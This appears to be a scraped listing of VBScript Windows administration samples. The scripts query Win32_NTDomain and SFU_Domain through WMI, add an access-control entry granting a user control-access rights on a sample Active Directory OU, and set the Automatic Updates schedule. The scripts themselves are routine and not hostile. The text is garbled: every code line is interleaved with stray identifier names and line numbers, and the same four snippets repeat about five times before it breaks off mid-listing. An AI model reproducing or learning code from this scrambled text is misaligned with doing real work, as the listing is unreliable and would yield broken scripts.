    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    1156

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    1157

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    1158

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    1159

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    1160

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    1161

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    1163

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    1165

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    1166

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    1167

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    1168

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    1169

    Wscript.Echo

    Echo

    1170

    Next

    1176

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    1177

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    1178

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    1179

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    1180

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    1182

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    1183

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    1184

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    1186

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    1188

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    1189

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    1190

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    1191

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    1192

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    1193

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    1194

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    1195

    objDacl.AddAce objAce

    AddAce

    1197

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    1199

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    1200

    objSDUtil.SetInfo

    SetInfo

    1208

    On Error Resume Next

    1210

    strComputer = "."

    1211

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    1214

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    1217

    For Each objItem in colItems

    1218

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    1219

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    1220

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    1221

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    1222

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    1223

    Wscript.Echo

    Echo

    1224

    Next

    1228

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    1229

    Set objSettings = objAutoUpdate.Settings

    Settings

    1231

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    1232

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    1234

    objSettings.Save

    Save

    1241

    On Error Resume Next

    1243

    strComputer = "."

    1244

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    1247

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    1249

    For Each objItem in colItems

    1250

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    1251

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    1252

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    1253

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    1254

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    1256

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    1258

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    1259

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    1260

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    1261

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    1262

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    1263

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    1264

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    1265

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    1266

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    1268

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    1270

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    1271

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    1272

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    1273

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    1274

    Wscript.Echo

    Echo

    1275

    Next

    1282

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    1283

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    1284

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    1285

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    1286

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    1288

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    1289

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    1290

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    1292

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    1294

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    1295

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    1296

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    1297

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    1298

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    1299

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    1300

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    1301

    objDacl.AddAce objAce

    AddAce

    1303

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    1305

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    1306

    objSDUtil.SetInfo

    SetInfo

    1314

    On Error Resume Next

    1316

    strComputer = "."

    1317

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    1320

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    1323

    For Each objItem in colItems

    1324

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    1325

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    1326

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    1327

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    1328

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    1329

    Wscript.Echo

    Echo

    1330

    Next

    1334

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    1335

    Set objSettings = objAutoUpdate.Settings

    Settings

    1337

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    1338

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    1340

    objSettings.Save

    Save

    1347

    On Error Resume Next

    1349

    strComputer = "."

    1350

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    1353

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    1355

    For Each objItem in colItems

    1356

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    1357

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    1358

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    1359

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    1360

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    1362

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    1364

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    1365

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    1366

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    1367

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    1368

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    1369

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    1370

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    1371

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    1372

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    1374

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    1376

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    1377

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    1378

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    1379

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    1380

    Wscript.Echo

    Echo

    1381

    Next

    1387

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    1388

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    1389

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    1390

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    1391

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    1393

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    1394

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    1395

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    1397

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    1399

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    1400

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    1401

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    1402

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    1403

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    1404

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    1405

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    1406

    objDacl.AddAce objAce

    AddAce

    1408

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    1410

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    1411

    objSDUtil.SetInfo

    SetInfo

    1419

    On Error Resume Next

    1421

    strComputer = "."

    1422

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    1425

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    1428

    For Each objItem in colItems

    1429

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    1430

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    1431

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    1432

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    1433

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    1434

    Wscript.Echo

    Echo

    1435

    Next

    1439

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    1440

    Set objSettings = objAutoUpdate.Settings

    Settings

    1442

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    1443

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    1445

    objSettings.Save

    Save

    1452

    On Error Resume Next

    1454

    strComputer = "."

    1455

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    1458

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    1460

    For Each objItem in colItems

    1461

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    1462

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    1463

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    1464

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    1465

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    1467

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    1469

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    1470

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    1471

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    1472

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    1473

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    1474

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    1475

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    1476

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    1477

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    1479

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    1481

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    1482

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    1483

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    1484

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    1485

    Wscript.Echo

    Echo

    1486

    Next

    1492

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    1493

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    1494

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    1495

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    1496

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    1498

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    1499

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    1500

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    1502

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    1504

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    1505

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    1506

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    1507

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    1508

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    1509

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    1510

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    1511

    objDacl.AddAce objAce

    AddAce

    1513

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    1515

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    1516

    objSDUtil.SetInfo

    SetInfo

    1524

    On Error Resume Next

    1526

    strComputer = "."

    1527

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    1530

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    1533

    For Each objItem in colItems

    1534

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    1535

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    1536

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    1537

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    1538

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    1539

    Wscript.Echo

    Echo

    1540

    Next

    1544

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    1545

    Set objSettings = objAutoUpdate.Settings

    Settings

    1547

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    1548

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    1550

    objSettings.Save

    Save

    1557

    On Error Resume Next

    1559

    strComputer = "."

    1560

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    1563

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    1565

    For Each objItem in colItems

    1566

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    1567

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    1568

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    1569

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    1570

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    1572

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    1574

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    1575

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    1576

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    1577

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    1578

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    1579

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    1580

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    1581

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    1582

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    1584

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    1586

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    1587

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    1588

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    1589

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    1590

    Wscript.Echo

    Echo

    1591

    Next

    1597

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    1598

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    1599

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    1600

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    1601

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    1603

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    1604

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    1605

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    1607

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    1609

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    1610

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    1611

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    1612

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    1613

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    1614

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    1615

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    1616

    objDacl.AddAce objAce

    AddAce

    1618

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    1620

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    1621

    objSDUtil.SetInfo

    SetInfo

    1629

    On Error Resume Next

    1631

    strComputer = "."

    1632

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    1635

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    1638

    For Each objItem in colItems

    1639

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    1640

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    1641

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    1642

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    1643

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    1644

    Wscript.Echo

    Echo

    1645

    Next

    1649

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    1650

    Set objSettings = objAutoUpdate.Settings

    Settings

    1652

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    1653

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    1655

    objSettings.Save

    Save

    1662

    On Error Resume Next

    1664

    strComputer = "."

    1665

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    1668

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    1670

    For Each objItem in colItems

    1671

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    1672

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    1673

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    1674

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    1675

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    1677

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    1679

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    1680

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    1681

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    1682

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    1683

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    1684

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    1685

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    1686

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    1687

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    1689

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    1691

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    1692

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    1693

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    1694

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    1695

    Wscript.Echo

    Echo

    1696

    Next

    1702

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    1703

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    1704

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    1705

